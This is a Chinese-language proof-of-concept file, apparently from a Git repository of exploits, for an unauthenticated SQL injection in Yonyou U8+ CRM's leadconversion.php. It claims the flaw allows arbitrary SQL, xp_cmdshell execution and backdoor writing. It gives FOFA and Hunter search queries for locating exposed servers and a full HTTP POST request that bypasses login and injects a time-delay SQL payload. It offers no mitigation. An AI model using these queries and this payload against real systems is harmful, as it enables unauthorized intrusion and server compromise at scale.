POC/wpoc/用友OA/用友U8+CRM系统leadconversion.php存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

33 lines
916 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 用友U8+CRM系统leadconversion.php存在SQL注入漏洞
用友U8+CRM系统leadconversion.php存在SQL注入漏洞未经身份验证的攻击者通过漏洞执行任意SQL语句调用xp_cmdshell写入后门文件执行任意代码从而获取到服务器权限。
## fofa
```javascript
title="用友U8CRM"
```
## hunter
```javascript
app.name="用友 CRM"
```
## poc
```javascript
POST /lead/leadconversion.php HTTP/1.1
Upgrade-Insecure-Requests: 1
Cookie: PHPSESSID=bgsesstimeout-;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
DontCheckLogin=1&Action=getDeptName&userid=1%27;WAITFOR+DELAY+%270:0:5%27--
```